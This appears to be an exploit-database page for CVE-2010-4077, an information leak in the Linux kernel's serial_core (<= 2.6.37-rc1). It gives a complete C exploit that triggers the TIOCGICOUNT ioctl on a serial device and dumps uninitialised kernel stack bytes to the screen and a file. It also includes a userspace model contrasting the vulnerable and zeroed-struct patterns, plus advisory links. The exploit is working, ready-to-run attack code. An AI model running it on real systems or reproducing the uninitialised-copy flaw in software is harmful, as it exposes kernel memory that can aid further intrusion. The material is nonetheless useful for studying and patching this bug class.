Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit

2011.03.15
Credit: prdelka
Risk: Low
Local: Yes
Remote: No
CWE: CWE-200


CVSS Base Score: 1.9/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.4/10
Exploit range: Local
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

/* Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak
 * ================================================
 * Information leak exploit for CVE-2010-4077 which
 * leaks kernel stack space back to userland due to
 * uninitialized struct member "reserved" in struct
 * serial_icounter_struct copied to userland. uses
 * ioctl to trigger memory leak, dumps to file and
 * displays to command line.
 *
 * -- prdelka
 *
 */
#include <termios.h>
#include <fcntl.h>
#include <unistd.h>        /* close(), write() */
#include <sys/ioctl.h>
#include <linux/serial.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char* argv[])
{
    int fd, ret = 0, i;
    struct serial_icounter_struct buffer;
    /* number of ints in reserved[]; taken from the struct so the loops
     * below never index past the end of the array */
    int n = sizeof(buffer.reserved) / sizeof(buffer.reserved[0]);

    printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n");
    if(argc < 2){
        printf("[ You need to supply a device name e.g. /dev/ttyS0\n");
        exit(-1);
    }
    /* zero the userland buffer so any non-zero reserved[] value seen
     * afterwards was written by the kernel */
    memset(&buffer,0,sizeof(buffer));
    if((fd = open(argv[1], O_RDONLY)) == -1){
        printf("[ Couldn't open %s\n",argv[1]);
        exit(-1);
    }
    if((ioctl(fd, TIOCGICOUNT, &buffer)) == -1){
        printf("[ Problem with ioctl() request\n");
        exit(-1);
    }
    close(fd);
    /* display the reserved[] contents returned by the ioctl */
    for(i=0;i<n;i++){
        printf("[ int leak[%d]: %x\n",i,buffer.reserved[i]);
    }
    if((fd = open("./leak", O_RDWR | O_CREAT, 0640)) == -1){
        printf("[ Can't open file to write memory out\n");
        exit(-1);
    }
    /* dump the same values to ./leak */
    for(i=0;i<n;i++){
        ret += write(fd,&buffer.reserved[i],sizeof(int));
    }
    close(fd);
    printf("[ Written %d leaked bytes to ./leak\n",ret);
    exit(0);
}
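
The bug class behind this leak, modelled in userspace as an added example (not part of the original exploit or of the kernel source): a handler that assigns only the named counters and copies the whole struct out, next to one that zeroes the struct first. struct icount_model, the 0xA5 poison fill standing in for stale stack contents, and the function names are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Userspace model (assumption: mirrors struct serial_icounter_struct:
 * eleven counters, then a reserved[] tail the driver never assigns). */
struct icount_model {
    int cts, dsr, rng, dcd, rx, tx;
    int frame, overrun, parity, brk, buf_overrun;
    int reserved[9];
};
#define NRES (sizeof(((struct icount_model *)0)->reserved) / sizeof(int))

/* Constructed stand-in for stale stack contents. */
static void poison(struct icount_model *s) { memset(s, 0xA5, sizeof(*s)); }

/* Vulnerable pattern: assign named fields only, then copy the whole struct. */
static void fill_vulnerable(struct icount_model *out, int rx, int tx) {
    struct icount_model tmp;
    poison(&tmp);                     /* models whatever was on the stack */
    tmp.cts = tmp.dsr = tmp.rng = tmp.dcd = 0;
    tmp.rx = rx; tmp.tx = tx;
    tmp.frame = tmp.overrun = tmp.parity = tmp.brk = tmp.buf_overrun = 0;
    memcpy(out, &tmp, sizeof(tmp));   /* stands in for copy_to_user() */
}

/* Hardened pattern: zero the entire struct before filling it. */
static void fill_hardened(struct icount_model *out, int rx, int tx) {
    struct icount_model tmp;
    poison(&tmp);
    memset(&tmp, 0, sizeof(tmp));     /* wipes reserved[] and any padding */
    tmp.rx = rx; tmp.tx = tx;
    memcpy(out, &tmp, sizeof(tmp));
}

/* Bytes of stale data that reached the caller via reserved[]. */
static size_t leaked_bytes(const struct icount_model *s) {
    size_t i, n = 0;
    for (i = 0; i < NRES; i++)
        if (s->reserved[i] != 0) n += sizeof(int);
    return n;
}

int main(void) {
    struct icount_model a, b;
    fill_vulnerable(&a, 12, 34);
    fill_hardened(&b, 12, 34);
    printf("vulnerable: %zu bytes leaked\n", leaked_bytes(&a));
    printf("hardened:   %zu bytes leaked\n", leaked_bytes(&b));
    return 0;
}
```
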

References:

https://bugzilla.redhat.com/show_bug.cgi?id=648663
http://www.openwall.com/lists/oss-security/2010/10/25/3
http://www.openwall.com/lists/oss-security/2010/10/07/1
http://www.openwall.com/lists/oss-security/2010/09/25/2
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=d281da7ff6f70efca0553c288bb883e8605b3862
http://www.securityfocus.com/bid/45059
http://www.redhat.com/support/errata/RHSA-2011-0007.html
http://www.redhat.com/support/errata/RHSA-2010-0958.html
http://www.openwall.com/lists/oss-security/2010/10/06/6
http://secunia.com/advisories/42890
http://lkml.indiana.edu/hypermail//linux/kernel/1009.1/03387.html


Copyright 2018, cxsecurity.com

 
